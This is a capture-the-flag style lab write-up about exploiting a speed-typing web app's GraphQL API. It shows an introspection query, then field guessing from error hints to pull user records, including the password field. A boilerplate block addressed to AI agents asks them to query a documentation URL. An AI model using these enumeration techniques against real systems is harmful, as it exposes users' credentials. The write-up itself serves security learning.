# Sokudo (16/04/2026)
This is a new web application! We haven't seen this one in the rotation at all, so let's take a look at it from scratch.
## Initial Analysis
We tried default credentials, as well as blind SQLi and user enumeration isn't the path forward this time.
Time to create a new account!
We instantly see something suspicious here during registration as right after we have a call to `/api/graphql`.
Nevertheless, let's take a look around the web app.
So this is a speed typing competition type web app.
And we have a leaderboard! Of course we are #1 hehe.
## Finding the bug
Okay, so while browsing the site we notice that nothing else is off-putting besides the GraphQL request. Working with Burp, it automatically adds a new tab if it notices the request is GraphQL syntax.
It looks like the following, so it formats it nicely for us and gives us the variables used:
Let's send it to the Repeater and right click to open the GraphQL options:
We can set the introspection query so we can gather information regarding the schema. If it is enabled we get full details, if not we get the details that we currently do:
{% code overflow="wrap" expandable="true" %}
```
query IntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
subscriptionType {
name
}
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
```
{% endcode %}
and the response is:
{% code overflow="wrap" expandable="true" %}
```
HTTP/2 200 OK
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Thu, 16 Apr 2026 11:30:59 GMT
Etag: W/"9a6-mVPDo/grP/EfDShqrTafr6Txb94"
X-Powered-By: Express
Content-Length: 2470
{"errors":[{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"__schema\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"queryType\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"mutationType\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"types\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"directives\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"args\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"kind\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"fields\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"args\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"type\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"inputFields\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"interfaces\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"enumValues\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"possibleTypes\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"type\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"kind\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"ofType\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"kind\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"ofType\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"kind\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"ofType\"."},{"message":"GraphQL introspection has been disabled, but the requested query contained the field \"kind\"."}]}
```
{% endcode %}
So we at least know what the fields are called, now let's explore some GraphQL attack paths and try to implement them here, we would ideally be using some of the fields to write queries.
{% embed url="" %}
Since our website only really has a typing speed feature and a leaderboard feature, we might need to take a look at users, none of the fields from the introspection query lead towards any information about users unfortunately (just guessing by the names), so how about we try to query some information about users.
{% code overflow="wrap" expandable="true" %}
```graphql
query {
allUsers {
name
}
}
```
{% endcode %}
This one was a whoopsie as well, since we don't need to include the query {}, as when we see the request regularly this the way that the body is being formatted:
Nevertheless, the web app gave us the hint we needed. Back to the GraphQL interface.
## Exploitation
Well, the web app is basically telling us to fix our query, let's try their suggestion.
Okay, step by step information:
{% code overflow="wrap" expandable="true" %}
```graphql
{"errors":[{"message":"Field \"users\" of type \"[User!]!\" must have a selection of subfields. Did you mean \"users { ... }\"?","locations":[{"line":1,"column":2}]}]}
```
{% endcode %}
The question is, what are the field names for {users}? I guess we have to do this manually since introspection is blocked.
Unfortunately, just getting an error this time won't give us the way forward, so we have to guess.
What kind of fields do users usually have? Let's remember our registration.
{% code overflow="wrap" expandable="true" %}
```
{"username":"minatour","email":"minatour@gmail.com","password":"minatour","full_name":"minatour"}
```
{% endcode %}
and the corresponding GraphQL query:
{% code overflow="wrap" expandable="true" %}
```
{"query":"\n mutation LogActivity($event: String!, $userId: ID, $metadata: String) {\n logActivity(event: $event, userId: $userId, metadata: $metadata) {\n id\n event\n timestamp\n }\n }\n","variables":{"event":"user.register","userId":"4","metadata":"{\"username\":\"minatour\"}"}}
```
{% endcode %}
At the very least we know we have the username and userId fields.
I guess we don't have userId though?
Let's try to see if we can re-use any of the information we sent during registration, we can try the password field.
Nice lab!
Technically with graphql fields if you are close enough to the fieldname it will usually give you the full field name.
So you don't need to bruteforce plurals for example if that ever helps.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://minatours-notes.gitbook.io/blog/bugforge/dailies/sokudo-16-04-2026.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
